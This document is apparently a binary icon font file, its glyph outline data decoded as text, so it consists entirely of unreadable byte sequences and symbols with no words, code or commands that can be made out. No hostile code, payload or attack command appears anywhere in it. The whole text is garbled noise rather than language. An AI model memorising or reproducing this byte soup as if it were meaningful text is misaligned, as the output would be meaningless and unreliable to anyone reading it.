² LK X]-; PPJ<`0p4 4<5@ /B//D.† - -!ÿ¨˜K"#"'.6762#"&547#64&#"#31267>&'."2677654&vþpD%L6##‚(h(&&þË
þ÷"$854'%HPHþ~1""1#]d]$½	þo6#__#ƒ&&(,/&þË

þ÷/3 !4'^^&þ}0‚‚1#''#’	ÿ¦¬+C"7>76'&'&"'&'&476762#"+";2654&ôueb;<:8bewzhbv;:dfu`SO/00.OR¾QO/0[NRE;†Ð;9actxhe<=<9Æsyhe<=üì/.PQ¿RO.00.OR_\ 01cÒ<ÿ¨ª4I^64/&""/&"2?62276764/&47"276764'&'&"'&'&476762¿!
‰
‰
!‰.=!
‰
-Y
ˆCwfc9<<9cfîfc:<<:cfwdVS1331SVÈVS1321TVõ
"ŒŒ#
‹
/>
"‹-[
Œ
«<:cfîfc:<<:cfîfc:<üÙ31SVÈVS1321TVÈVT12ÿ¨ª!'77'?& 3254 &6 ª¶¶¶¶¶¶¶¶eþ•ÿ€ƒ²¶štþ°èèPè.¶¶¶¶¶¶¶¶þý³¶²¶þ.tèPèèþ°ÿ©©+3!2654&#!"!"&5463!2%77'7''?'ä''ý'ýR''®''ý§ææ!ææ!ææ ååÐý''ä((üØ'®''ýR'”åå ææ!ææ!ææÿ¨ª!!!77'7''?küÌ4ý€ææ!ææ!ææ ååü”lü°4ý`åå ææ!ææ!ææ Š		'	7û%þú%þùþú&þù&Š%þùþú&þù&%þúÿ©ª4EW6/&#""/&#"2?6232?64/&47&#!"3!2654#!"&5463!2ô3˜

›	/

œ

œ4›

›	4	
2",ýp-@B+.@7ýp!!4—

š1
š
	›3›

›3œ
	~ @.ýp.?@-,ýD!!ÿ¨ª+!!'&#"'&#"2?2?64/76?küÆ„2
²²3

´´4²²4´´ü”lüÆüøP4±±4
±²3³³3³±‹7"'&'&"2?622?64'&/&4?64/&"Æ+VA‚A ÂÃ0Ã+VA/*WAÃ0ƒ+XB„A ÅÆ0Å,WB0,WBÆ0´¡ 9lˆ.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%62546;276/&47]	J>B<?5K+3V2+	lI±Dl-#üÄ,L-&B,LY#	._=þN?`"	
M7¦9P,2:7>k(/;9?<B
2&ý3$6kk•B]	- %2V3C5'Y.ALK~j-K, -K,

6ú9EE:H@*629:cYC`':0[A
"o÷3ˆŒ7lk´¡ 9l|Œ.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%'7#7767#'635&3>]	J>B<?5K+3V2+	lI±Dl-#üÄ,L-&B,LY#	._=þN?`"	
M7¦9P,2:7>k(/;9?<B
2&ýo#L #4'# 		K6D5'"•B]	- %2V3C5'Y.ALK~j-K, -K,

6ú9EE:H@*629:cYC`':0[A
"ošM
:‡
K9=´¡ 9lˆ.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%2?;26=?64/&]	J>B<?5K+3V2+	lI±Dl-#üÄ,L-&B,LY#	._=þN?`"	
M7¦9P,2:7>k(/;9?<B
2&ý3$6kk•B]	- %2V3C5'Y.ALK~j-K, -K,

6ú9EE:H@*629:cYC`':0[A
"oÅ3ˆŒ7lk´§=Z.'.'&'&3!2>&!".67>7>67676'.76&'&&3!>&\	K@C=?6Ei	8&.oI¹Em."`>þGAa$'5		4K+0<:@=D
3'†
<7?m)3R3
1)O7®;P,–D^
.
LD/…MM€°:EFwo&*>	1\B
#p‚Db(;?7We;:fYÿ¨ª/3TX."2>42'&'7654&"'>6"&'.'6=4/&?326?7'7‡"v£°£vDDv£°£vEþJF1+3ò®—\
Ê.lÚf¬OF1*2ò®›XÊ-mÚc¨QvEEv¡´¡vEEv£°51+l;h@C;\tSË#%ˆeKbþ51*i:hAE<Ys
SÊ#&ˆbI^ÿݪß'AQU=4/&?26=426?654&"?6=4/"32"!"3!2654&!!ñ¸¸è
7
4|¹¹7üþüþ*P/11/O'xã		
Ú&P&P/22/ýg™ý3Aÿ²«,048./!"376?6?636232767656!!!5!7!5!§!ý*¸GŽ	0¿0ý*þÖãþãsýªVà
þ	Í	A
íßDŠDÑCÿ©ª)KT]ht‚2767654&'&"'&'&4767>.'&/676?'&".6&7>&764'&'6'&'&'&767'6æqÁ9;;:dfìfd;<xejhfWU1310SUÈVS1320RT
'M26S)fXBI~p-9.		
¯Q	"
s`dïgc;<<:bfuxÌ:<üÙ10SUÈVS1211SVdaUS24–&J8RS
	o->z;:I#
		Ä3Á2±!	ÿ¨ª+<A32767654'&'&&'&'&547>2&'%"'%&/îveb8;<9dfxveb:<<;dhr]OM,//.œ·OK[XLQþõ4'®Wþú!¸=;bfuxfc9<<;bfvxgd:;üõ.-LN\_PMY.,—X\ 01˜€gT)¬-Z9XÿçªÕ'05!3!#"3!26=4&+5!2765.#!"5!züôXYüüÔýò=))=
3ýöÿë²ϙ%&"'&'&5654&'&547673>?65?6='&'5&5'0#&'#&#'&+'.#"7>'.767676>'4767636716?5632676&u2.B4 "	
	?H=:#
&&+'84..CE	 	-

>7
91¢ %40LF
			+#9EDD>'+
o&A<	/%

CB0$#5!< #GÿîªÎ'+!"3!2654&#!"&5463!27'35#“üÂ	

	>



ý	

	ø

ý0@@~–•ÖããÎ
ýN


²	ý[


j	

	´@@|—•þÝ!ÿ¨—)\iw‰™"2>4.'&7672?&'&>32#3#'#36+3!2654&#!".4>2%2;>&'#"2>&'&#"3622;264&#&#"d&@&&@L@%%@+(7& $

þ9)
*<: , 

2
*8	Y''ý§'«.N./M\M.-Nýá@x‘
vA-y! B

:,ð(COC'(CNC(Ù!,"%%'¹F05"D'>3;.,;&è'&ýÀ0QaQ//QaQ0€àÓÿçªÕ'+5!3!#"3!26=4&+5!2765.!züôXYüâüôÔýò=))=
/ýòÿ¨¨3X"'&'.476767632'2>7654'&'&'&"7#".46767632.#"3276ô_SP:8@ :<NS_cŸ:7""7:¢`PU+)B@ ?C)-.YÉ%6%9S8*'7+2"
'49<0X"!;:¡¹RM=< "B;8SNÀNQ9;CX7[B>LJ@B---0~”A?_6í 
'AXbV#!6
D?C@ª…	#4&#!"!3!265+"&=46;2ª+ý&*kü•*Ú+ý¡œœ=**)yþä++ý2ÿ©ª?O%#"&54&#!"&=4&+"+";23!2;26=46;26=6&)"&5463!2“š	
	þŸ	
	#	
	˜


˜


a


!	
	š	
þàþï		


¿
_


š	

	š	
	"


þ¡


™


™


!

	


þð	ÿû¬Â,<.>'.'6&'&73!267776&!"3!26=4&
œOn
#nëc\
$œýÔ,ù#B"
#
"þódþ½+þV66ÿ¨o&945&?%65%&'.654&%6&#%&767oŒ’Hdþr™ª
	`T)þ›þñ-]\¸QT*ˆþñÎ	ÒXcþî‰Ë˜ÓΜ
Ê6j	ÿ®©!4FVi}ž4#1"376?65'&/.=4765"/&767<#63767675'&/&=47&7676'#&'&74=41#631676'&/&=4765#&/&7ÁÁ(OJ×;t
»¶Á“~?PEÁJO(×\S

˦f\b0

ÀþøA€jW×+V8
»¶/^4b1Àoà.+r!DákÝuoTH%0&oà+.r41án’Ht<48	oon%Jà<4x2 ákÝt68o	ÿí«Ï!)3}’£ª&#!"3!26542"5&6#2"&54#2#"&54#!"&5!>'&4767637>&'&767>364&#"/&76.#'&'7674#/&5&'&'7676&'"7.76¥
#ýý‡-D
:
üÿ=þE
3
$!6
2
	$Ò&&" =
#1Z!"&.5#³ýŠ??
.

.ý

þ'-$'
 H#*7l&-"$)„
	4:
"*(Ck '$?"Fr
j'(ªV1D676764'&'&;265676&";26'&''"7>747Ì	<ORU[P„=%2¾``]Û""	3©d
	
öÂ2,HˆRUà]/		V
	/f8
ŽŽ–X
ÿ©*#/<@DHL&/.#!"3!2654&3#'3#'2#2;&'676'>3.!!!5!5!5!5#53 '
"þc$Ê00D00"J$#*0$Q(¢þ^¢þ^¢þ^¢//’&-ü܈%ÆHÐÐÅ"1	$'41Ä&™&+&¤ÿ©x/CWc27>=4&'&"27>326=6'"'.'47#"'.'327.%&'#"32>54&##5#53533ØbTQaaQTÄTRaaRTbB<Q0dNRºROdaRTÉ17]ROdaRTbnT)2&31%
)6$=$2,'++',¡=#l$==$l#=û	(1XX"77"²$=N7"²$<S&%07'$>$0`++',,ÿ©w
2Gdx%"01354&7&'#"32>54&+"=4;54>3227>=4&'&"27>326=6'"'.'47#"'.'327.õ&T$3/$#/#<#@Pþ·bTQaaQTÄTQaaQTbD:Q0dORºROdaQTÉ17]ROdaQTboT*2„
0$#/-$#<#/€4
L=#l$==$l#=û	(1XX"77"XX$=N7"²$<Sÿ©w,I]%&'#"32>54&#5327>=4&'&"27>326=6'"'.'47#"'.'327.Q%2/#/#<#2xxþ©bTQaaQTÄTQaaQTbD:Q0dORºROdaQTÉ17]ROdaRTbnT)2´%$/52#<#/Z"7=#l$==$l#=û	(1XX"77"XX$=N7"²$<Sÿ¨^,A27>=4&'&"%"'.'27>=4"'.'27>5'ôbTRaaRTÄTQaaQTÊdORºROdaQTÄTRaþ—]ROdaQTÄTRadOR¡=#l$==$l#=;"77"XX$==$XXþŠ7"²$==$²"7ª)b4#!"3!25'"# '"/&'&'76?676373"'&'&"2?622?6764'&'&4?6&/&"ª ýãþõZ/‚ 6þµ¦…B–K
mÚ¯‘#4
F"	hh	h
"C
	"Fh	qþì		\1†‰E	›Ma#5F$
j
j		j"E		#F
j	ÿÿ«¼,<KZhw2766&#!"7'.+"2764+'"'&/&"3!26%;26'&'.&/&;26'#"6?676&!#"7676&]'X1bþÞþꈘçfV+ŒRe2(-E48þL aà'+Õ0I6à¼Þ
HG'þæÞ'GHœ4i넍þõ
’äs&
˜,#DgNV*Þ1’ioÞ%ImHômk;g44g;kmÿ”–$-6?T^gqzƒ45&76'!3!26".6.46'".62".6.>&/.?6764"&5>23"&>2'462."&467"&>2Ü%þ»
56_!˜&V}Ý"Cf'EŠË&'€@þl 6 N l° @@/
1Æ27a" þÿ ¢! l"Gþù$FjH’Ô'(	…B+=!!"ÃþÜ!a!"ÿ¡²'09BK&%&6766&.7>7.>7.>.>7.>7.>d¯þ¤3#"k$)
(CEX%ýÏCJ#CI$5CJ#CK#4
CJ$CJ#ÙCJ$DI$5CJ$CI%4
CJ$CJ$r5h
$8pþ›(C$)ã))Cþ=$$D%#$D°$$DJ#C¯$$DI$DýÉ%$BJ%C°%$DJ#B°%%CJ$Bÿ¨ª/<"2>4."&462&'&'&#"2767654'&".4>2ô11:11!!-  $&-3:<?wfc9<<9cfîfc:<! þ‹)E))ERE))EÉ1:11:1¢!-  -!f' <:cfîfc:<<:cfwWPLþv)ERE))ERE)ÿ¨©&+;K[k&/&+"#!"&54&+&"!2654!!#";26=4&!"3!26=4&!"3!26=4&!26=4&#!"¢2e
	þT
3<òmýt§K		K		Yþ

ÿ	
þ

ÿ	
ýûÿ		þ		u3e	þô			ý
 CB	ý‹~þ‚Ó
		
þt
		
l				¤
		
ÿÞªÝ'9IYi5354&+54&/&'.#!"#"3#3!265%463!2!%!"3!26=4&!"3!26=4&!"3!26=4&äŸp
&þ¿p Å%À'ýw


	þZgþÓ-þÓ-þÓ-@!=w	.
	®!þÌ4!:

îâDJÿתä'09%"'&4?6246;2762!5#"/462"&'462"&{þÙ;–
cŒ:üj¼pqÞ „m9’w

þ“ˆ9ìÉÉmmeÿÄ©ø+%2764/&"4&+"'&"!5#3!265ã&;‹
b
•;týˆy#ò#ƒ9‡l

þŠ‘9”ÎÎþõ$$´¡ 9l†.'.'&.#"3!>&%4>32"'.'.#!"&'&73!2>&'.56&'&#&'67676%2?64/&""/&"]	J>B<?5K+3V2+	lI±Dl-#üÄ,L-&B,LY#	._=þN?`"	
M7¦9P,2:7>k(/;9?<B
2&ý6"D$ *•B]		- %2V3C5'Y.ALK~j-K, -K,

6ú9EE:H@*629:cYC`':0[A
"ow„!!@&0ÿ¨¿c'&"#&'52?64/&"2?#764/&"2?64/3'&"2?64/&"56732?64º°#SÙ#Y#°¯#SÔS"°°#ZÛT#¯°#Y"àY#¯g°#S!ÄY#¯°#SÁS#°¯#YÆS#°°#YÉ Y
#¯ÿ¨«G'&#.'5326/&";#54&6=3#"2?6&+5>73?64¢¢:)’‘):¢¢:)’‘):¢r‘)9 ŽŽ :(‘Ž‘(:¡ŽŽ¡:(‘ÿ¨ª/G_7622?64/&"2'&"2?64&4?64/&"2?64'&""/&"2?64'~i
iš
š
,›
ji
šüúi
š›
n
i
iššEii
š›
ܚ
i
j
š


j
›
š
vji
š›
ÿ¨ª,7!&'&'7'7!7'7'!'7'>7!7"&4673ù›þÍ#—
««
—#2þʛ°°›62#—
««
—%23›±þK!/,+.	
—#4›±±›þÌ2#–
««
—#2þ˛±±›42$—
«P/@..A/ÿ¨ª$,PTb‚‹“š£ÈÜåð236&/367#&'3.'&676&>'623?67'6'6&?#7"664'73'3/?'37'775'57'/7#'?'+?'575?#7'7/##33357537567'7537'#/735/37'5'5'#?5?/?//?353'"276764'&'&"&'813/&/4#'2&'276/26?4'&67674?656/&5&'&/501'#"5#"5#'##6&&6&6'.'&5'"5>7632"#73#7"33#7"6'6?676"&#'365&''&7>?6763727>&'&'&'6/&62/&/&#/&#.7&#";?27322121"3725743?4?674?>56?6/&?6?6'5"'"5'&/&/&/&/&/&'&/&43633?67676'&//&'2766?6'#3ìn	$p1(
Œ
/I	
¸6wfc9<<9cfîfc:<<:cfw8i,!

	


fHKT


		
		

	


	 			


B




				 #10QT/?a6
HÉ
	=
7J	I
4


t
s
	(n	+»V<:cfîfc:<<:cfîfc:<üâ"

	
O€#%
	

			


	
	-






		-k9bTQ01Êÿ©<)7CQ_!"3!2654&"&4627!!?66=3!"3!2=4&!"3!2=4!"3!2=4&!"3!26=4ý´LþËþýñ(OO59þh˜þh˜þh˜þh˜üÜ$ü¨7ÖÝQQÝþ³!!S!!U!!S!!ÿ©ª-A##!"&546;27276?6&#!"3!2654&;26764/&"¦„ýÖ	ŸP
7/ýïN	ý©	¡„©þ|Ô†Q +8/ü²k¢„ªþ|ÿ¨ª!"3!2654&!5!%PýH%44%¸%55µþh˜þmÊÉ5%ýH%55%¸%5ý~DMþù«‡
"z•™œ?2?%677>/6#!"6767676'&'&'&'&6767673623>'&'&76767#.'&'&&/"/&'3!676&'&7&'	

þ0.]¹\		‰*üè(E(+

)

	
	%


*!
g´/´Ä "?üÞª8riªð

I>.]¸]	Š

)(!Z	"
d
 &*"	
œ´´Ä
>ª:rþ«Uªÿåª×%1=%"'&3!2654&27%6=4&#!"7!2#!"&46!2#!"&46
	þw	
4	þRJýl
‚þ~‚þ~µþ@Àçë	×לb«œ-&'$'&3!2654&%27%65&754&#!"í;þó8	

8

	¯ä	þ¼iÒ	¦üÆ
„
þt

Œ
	Urê4fÐ)
RÿØ«å6:6&/&'&"3;62?6#'#"'&'&676762!!‡##6H#%c&›Ïh%%,-+X+8Ùxð:

6mQ	7œ,	îQþ¯v$`$6G$&&›Ðg%c&-,Úv¸:7Bœ+î	— Š%''7'77 x´´x³³x´´x´ªx´´x´´x´´x´ÿ©¬x†¡"#&'&'&''.+&3;276&'&'32726=4'&'&+##6?676?6?67>&727;#"#"+"'&+3!2>'.©,X0O…B
')#t‰ [-&
…@bgˆT,'
	!
ýúL
–ÉYZ ’	TýÁ
W¬("0*G%	


HD#%'""Œ	<[»'A08

#!((P*#È
$ª²;!764/&"2?64/!26=4&%'&"!"3!2?64%þßk-ãã-s)wã-kþß)s-ã=k-ãã-tLŒã-kLt-ãÿ¨ª-"276764'&'&2"'6""'&473623ôwfc9<<9cfîfc:<<:cfw 7X#"&###<:cfîfc:<<:cfîfc:<¢þŽrýÜ>?ÿ©ª%!"3!2654&2"'6#"'&4762iý&&é&&þp 8X 1 %ý%%ê%¡þŽrýÜ / =ÿˬñ#2%&'&'&&'.3!27>2"'76"#"'&47623©qâ þ‰ãþG2A    (Ì–
ý]$>þ¹Gþ555Š%27&"&"27654ô!K]#5!!5#ï‘þo?#5!" ÿ¨Ž+64'&"!"3!27#3!"&5463!‡þâ9‡þ”

v‘9ÇÎÎþõ$$M&;‹
b
•;týˆz$ò$ÿèªÓ0hÐ!&/4+"/"##&'""32325%'&5&"5?676&/#&574&+"3272?6?6?57672?4376;265?4+"/&/&+";25'46?>'&/4326?5#&¦NŒ=,B/^5g!ýù^/B,=	…N
>5$W¡^/B,=ŠN
>5#Y½=7 l!
N…	=,D/^
\EWk!&9DC8&!eWQ>(²C8&!iWQz	(*QWf!&;Cÿ«ª'I#"#!"&5463!26=4&#!"3!2654&#";22?6;265(C
	þ					þx		Ô	ù		ÔVÔ	T	_	þè		ù		A		ý*

Š	±	SÓ
VÔ€		kÿ©ª3!"3!2654&#"&=4&"/&4?6&+"&=463!2iý%%ê&&]S	ÒUÑ~		W
	&ý&&è&þ	ÒUÒ	R	þ©	ÿý¬,<33#&#&'&'&'&767672>4."77.67>Ù6:7¹‰:;Oo_a$620À’$Qoca‚8`q`88`q`8ø$K/"(R3P¬C§HIbG=@±!,*aF>þº8`98`q`88_=76) E
DU!«™)4E&'&'3654'7676&'#".6&'.676767&©(.1:?P3T‘UøV^ëuÜi7>4ís->(=*3éþ¶!Ô
	Bf"TH??)+L%=d2T'þÖ#¼`&ºK/ 2+MÒ&ƒ
	M"	3T0$ÿ¨°>L&'762?6767>/&#&#"&=6'4767>276/&7%23=!E.5:=eȗ5iz=#îxzpƒe7&32J5/78
=dɗ7H$
|?.ô{ƒoƒ¬J"09'&'&476?6367676&'&'&'&'477>4&"ñԎ.(uëèµ?,qî

iV4O,8XþTT(gA	
R”"J}'@½##Š.K¹(þe>#3¨22TS4
#M
N‡ÿ»ª06?676&'&/&3?6?6762&/&æ
:rQ½
‹;"
x;ô>|C@'vB
A„+é#1b8
?ŠF
þèg5ÿ¨—,;IXhw‡—§·Ç×ç#"&=4&#!"+"3!254%46;2+"546;2+"546;2+"5+"&546;2+"&=46;25+"=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;27#!"&=46;23!26=46;2%#";2654&Oþ–„[þcþýþýþýj”BBBBBB–BBBBBB–BBBBBBþ6!j!ý”™
™îîýÂ>É8
4
ýéDþ¹ADA=Aþ¼ADA=Aþ¼ADA=A;1nývŠÿ© &/.#!"3!2654&
 &
!þo
’&-ü܈%ÿ¨z)6CP]m}Š—¤±¾Ë3!2654&#!""&=462'"&=462'"&=462'"&=462'"&=462'"&=462!"&5463!2!"&5463!2"&=462'"&=462'"&=462'"&=462'"&=462'"&=462n
Êý6
b






¹þ¼

Dþ¼
Dt




óüÖ

*üë
‡

†
‡†
‡
ý_
þñ
”þñ
þl
‡

†
‡†
‡
ÿ©«?676=476.#!"‹	sBüçvþsƒ	õX
  
ÿ¨Ç-Q76'&'&76&'&/&'&'&7&767676&'B""9*
%		2,Í	$"'½.%=	



#4
	ú/-20)(.7(9JIEF<P5ª!%&"@!!%HAUJ+B‹2.,$)!$ %$		
ÿ¨ò‘%&'&'&/&67676'&/767676'.'&7676?676?6764/&'&7676?'&'&'&'&767676'&'&'&'&/V

#3		$	
R*#!<0				)B	Œ!!/(2$+C

6		ž
H;‘7,(	')
	<U$"
	
 #$:4&$
ÿ¨â8!!7;26?67676'&'&'&'&/&'&'&'&®þRK%#	W!(
7( 
$H 1&&
"6¡'-”’3'*+*
P;L

)8*1,VP:B4Mÿ¨-&/4&"3726'-hÏì>™>=‡&+$üªSÿ§=)KQ&'&'&/4#?265767676766'%67'/7'6767&/6&''6&õ*,%+3J'@8
::;:A'L4,$,*þq%F	A";77;)CC*7557/=>.754ò

#5
üè
K#
	

"eeqd!!B :
dqr xeeÿ§?*&/&'&'&/4#?26576?676= 
.1,134K9$::=VX85'%#xG´	
)
üæ
V$ÿ¥;6\}/&'&'&'&76?6743767676?676'&2;6'&?6'&/&63%476?676'&/&6&'5&ó*3

+&/&'1		

$==%	6(—i
;	
+#F7+MFUnsK;18FE3>-8.!2GFý‚
-5U&I	D%1um	
idF2:0%$ÿ©¨*.<M]!"1;2657365?54&"&=4627!5!'37>/.26=654&#1"2326?6.–þ¼
M
¢
M
™



€þÞ"Ü	
\A
„
I]ýû

]I
þ 
S
Ä%]	;	<'?;
;	ÿ§ä	!'äþ–„øo'Fˆþ i
iÁÿ¨a$%&/&53264&+";3273276?<„

ë		*<v!DQ¢¢QDI*Sºg	
	þ™=S¨/4==4ÿ©¨(1.'5##335>735".4>2"&462\
S{JƒJ}T
LL
T}JƒJ{S
LþLHyGGyyGGy+>++>+ J{SNM
S}J„J}S
LMS{J„þ¶GyyGGyyG++>++ª¡354&+'.#!"!3!265É´ Í'þ„!_ýv+!¤ -ÕG !!”%þ `ª­!'.#!"3!2654&vþ¸$þš\""ýÕ""Û"ÿ¥|4Pi%>'56'4'&'&7676.'&3676?601.767676'&'&'7"'&67676?'&'&Œ6 .E
0!'O-#4%'		—þ*C3"@
	´$?1+#ó6G#E4FG.HI
Á)8	 -N2.X&2@YþR

N%D


 !
¸
	:@-#
"!*
ÿjxR/?k•¾#"&=4&#!"+"3!26=4&'#!"&=463!2!"3!2676&+"&/.?6&/&4?6/.;2?6'.+"/.?>;2?6/&4/"/&67676?>/&6?6)=	/ þÍ!.	= .	è	.¬	þÍ		3	»ý7
>
>
?þ‡	N/?		1	


2I A¹'			Ø	!..!	.!;		;!.				õ
ýš

f
þ+	8
#	¯	&
<	8•>9.
Kÿ¨ªy†&6?>/#"&'&=4&+"#"'&/"+";22?67632;26=476322?4/.>;26=4&+"&".4>2
0‹1

®	
8Š7EE
8‹8
	®

8‹8
D

Dh5[l[55[l[5Ú0
‹0

D

E
8‹8	

®
8‹8EE$
8‹8
®

s6[55[l[55[ÿ¯ª
–¦#&'&/.#'&'.'&'&'&/76&'&'&"&/6?>5&74&'&/7463>?6/7676?>?3?676766.'&>©
:
B 	FO
\	O"-	>W.*b		
.G
.\
ND
	@$þö%A&)E)$A&)E*º"$
30D
	k)+
CdJ2O	f0	'kj	D/*

ª&B)$@(%B(#@ÿÁªü…˜¡%&=4?67'.#"'&'&76?'&'&/&/&'#&/.#&'"372?637>?6767'&?>326567'&.7>376767637'&'&7>3257'&6<?6?&/.##'&'&?'&/&/#'&'&#'&'"3673627676'>.&/&75&?'&#"'&'&?67&'&&'#&5'##'&'&#&/"#"376737632374367667'&7>37257.>B,	
<5,A:C	4	<"
)	
þô&7:*&7<4(
	+
#
(

'+

	
 &4$&4$	

	
	†$É2	
/

	'H	-D5%!1
#
-	*G	D19&)49O51
/	"
	
-//"



Š#%4#%þ”

 





!
##ÿ·ª$.5<CJ2764'&#"&"&'&#";372+'6#"'&5432!5!"3!!%!!54&!265!Ï662-&:&-166¶J¶66}6õy7F6þª~þ¸ 6!þ¸þþº} þ£ þº`HHýW©m6462Šm¤ ýÆ!¶Û¥n ýo!ÿ¨´A/./&'&?67676?676'&'!3!265&'&']	7"þÚ 7	"	3"-
+j8		=4^O ™V_3>		8\1ÿ¯ª
);Nat„˜«¾ÎÜï#6."27676764'&#"&'&'&67676&=4667676'&'.676>2+"&767#&/&'&6;2/&'.67676&=467'&'"&=46;2'5463676+"&7&/&'&6%'.7676+"&767>32&'&'&66?6'&'&66?>&7&'.76746;2)<Ÿ´ŸxD"!=<Ÿ´QL?<!##"^2þÌ! f =
'1n
z1&
n _<&1nz1'
	nÁ$þu$}	^3B^	2		
%Š
 #|	^2;CCvœ´NL=;C" <<MQ®QNÓB=	
	HV)-SS-Œa5(¾`2*ÇR.VR-Ša'5¼a$9ß0	t	>AWGøD:	HVç
1o:EVHÿ¨¿!+G#5#"&46;5##364&#!"!4&3!26=!326+"'76'.676/7Bx¡TþÎ„þˆ$
$þ|Q9;;fM=)mM	þ	÷ý¹$%ë+!ÿ¨;
#54."#!462#ª":D:"ªŽþW9R9ÄY@!9!!9!@ýOñ(77(@ÿ¨L<""&54&""&54&""&=4&"'.32767654&	
*

*

*E3,	':DcjA1Û

?þâ		@þÀ		ýþ[]5í<%1&@*+ǪK4H%"#"'&67%654?67>..5>76#%!37676'&/&3ó³´3f		


/% :	%
Yþ™gY²X

þ›	u(;
u		
#4( 4&		q&0&1	:u	ÿ¨#3<EU^g763!2/&#!"63!26/.#!"!"3!26=4&"&4623"&462!"3!26=4&"&4623"&462k
ì
	1
	ýp2ìxþ#xýìþö,ƒ,Lýìþö,ƒ,Ô66¨‚	‚2µµ²,,,,òµµ³,,,,ÿñÿ‹ôD+&'&'&'&/&'.7>76?676&ï
$.4T)^GtLW–'<y`hV"/9l4'm	 $)/L(^ÍXJi
OOyPZwn+.3b3$4ÿîÅà67>"'&'.7>76ô$,sp(^'L`Ÿ"¸pTE#Y>SS*$!)a‡W]sdizYÆQ9E	‰ÿÂÂñ>T&'.'.767>."'76767676'&'.767645'.;>.+56£xXÀfbz%

&
:	97OPVO~Hj‚±RBй“dvþq
”
x –[C(&’h(
(
6UA?
]ŠP’ax*?‚s‹B


å>ÿè«Õ:'6=4&+"'&"?;2653;2654'6?6&ž`
\
¾		ôp98
ШÑ

2«D

>†«P(
Pþµ

&þÙP
H

ÿÓ«å^%4&'&/&/&'&327>76?637676?6767676/77>%/&'.767676?7636236©M	



"
B8ho,	.%$(6 9A#AþÙ:# 2#	)
#&1ž<+1& 

k?CD$!
	 %+""
#F#1
`(	0
	Dÿ¨!Hl€76=4&+"2&"&=4/&4?6=462764&#!"2"3!264'#!"&=4?64/&=463!2'&+";26=4n	Û
m_		_	ýÞ	_		_	#nþ¸	„		„	H	„		„	?4t4	ÚÖb	bþÑVVÑÑVVÑ
*Å
wwÅÅww
:..
??
ÿìªÏ/8AEIM!54&"!"3!2654&%462##!"&5463!2264&""354&7!!!!!!‰þË8P8þË

*þ**f¾ý,

Ôý$$2$$(8À8£aþŸaþŸaþŸO (88( ýÞ
"
'%ýã

ÔÍ%2$$3$8(EE(8‹'^&^'ÿòªË#-=M&"/&'&&"&/&'!26'2656.!"3!2654&#!"&5463!2©
	
$

(	"k	Õ'55M85PüäýH¸%
*/
00<R$3&(78M4)ývŠý|/ÿ¨›0N4/&#&#32!'&'&'!?>;'""3!2654%2?64/&"54&+"'&"š‚;0n@!þô"$ þò^m/;‚þMÎ)a
E
i)	®/V*2,~/®
qâä·Ç(_ÿ

þúf(¯DI'&'&'&76?67676'&/5&?7>'&'&'&'&'&767>Õ
	$+.F]&-;0;R97l).HYJ81	;C$	X$"/'|/27742:8,gc(Í)	

S]C
*8J?D	<p;d&=
>"B

'/I+S
3¡<%*C@AD-$",ÿ¨ª-H"276764'&'&2763622"'"'&4#&5474?35#'&5&54733ôwfc9<<9cfîfc:<<:cf¸

!

"	§Ä00”0<:cfîfc:<<:cfîfc:<§
5ýõ

â

þÏ	
ÿ©ª"<!"3!2654&6762#'&4#&5474?35#'&5&54733iý&&é&&þ/
!
4§Ä00”0%ý%%ê%¦
 	5ýõ

á
þÐÿ¨—1%&'##3#!65426767564'5&'&'&"•LìMM8à55ä#

þš
%!q
4'P&ÿ©ª+;K[k{2/$'&3!"3!26=4&%3!26=4&#!"%2654&+"3!2654&+"3!2654&+"3!"3!26=4&2654&+"3—þî‰þ‡+=üÆ		:		üâ	Õ		ý+	A		G		¹		F		þ		G		àüµ		K		þÓ		F		hl7–ýv		K				;V		þªV		þª		V		þª	Õ		þ+	U		þ«	ÿí«Ï&.84'&#!"3!72652#"&54#2"&54#2#"&'4#!"&5!©$ýci5ý…:

:üÿ
=ý‰?6.ý
ÿ©¡
8."/&!!26&/!&'&&/.3!26?6&™	*F G*:½ýȲ	UýåU
ól“
FD
‹t$·%ú	BA
ª--ý,
¡

¡
.ËËÿ¨ƒ$Š353326=65#%#;5326'4'&/&/&'&/&'&'.=4.'&#3676?>327>=33276767>=6'546;63"&462f
	S
}}
S	
I$&

zqce	|8>+#;:
~þu$11H22F

-

_ @XBƒz=		!		# 6
XþáY´<†gþä-4
 K?Ž	&Mšú
ÿ¨5!3!2654&'!"!54&¼þq5*ˆ* 6þ’	Ž	s?@2þèþç((1$'«
<<
ÿ¨R&52176&/&#5#2767654'.".46762TB™BIs !0.OR¾RO.0" s©I{HH=>’>=HH{Wv:;vbDFN_RO.00.OR_NFDcý¸H{’{$%%${’{Hÿ©Ž-W`%&/&3#"/.?6&#!"3!26'.+"!";265463!2?6;26'&/&'&;2© þÍL@L0þøÎ6ƒ-¢-‚5Ì‘wïvÌVc[QþäD þžûúþýc ì¯¯ÿ¨ª"3!2>54.#!".54>2?-L--M--M-ýâ-L-;I"+!8B9!#Fmýâ-M--M--M--MýÔ>&!8!!8C9þóÿ¬¯.7727747476767>'&7>'&#&'.7>.C
[":*{)km,>>,/“P	þ•	
%J‡:*(:(lZ[ (&œc!)FH<B4þ«T'9*&:ÿŬø&&'%.37676&%.>–[¶þï
%o8
dt:¶\
	ðýr0(2(WD‡Ë1
”IJU+ˆD	Cµ1(2ÿ¨9%4=46;26/&'.+"'";2+"3!26=4&+"&5.¢
8Ói'8¢
/

/vGF'

TÝnžÝ"
²>
0

1ª¸-#
'%''%'ô¶þLþK´¿ŠIIŠ¿¿ŠIIŠ|ŸŸqE1ww1èE2ww2ÿþª¾!!%!!%!!!!!!%!!?þü3þü3þûýškü•Žþr܏þq¾ÈÈÈÈÈ4È3ÉÉÉ«F'&767676767676?67767676767676'¦%#0't_WE>.)e[NF70"$28DIVY2;50(9km[XG>1(
	

)$/(/&(
	
!&$*#,#0-B9#G 1'(8A7;01" ÿåªØ%%%%%oþò&þëþÂþè#ËýÏý+-ÿ¨”&0P\5&/&'&'&'%5>4&%5>4&'5'45&567>767676'"37%rJC;u
59.("Ayyþgþ»))EË
(
lN
×W++þºFË
'+‚82"0&=!%*	Å
'0'	¢22§#*#þË+ƒ-@-ž+7$	
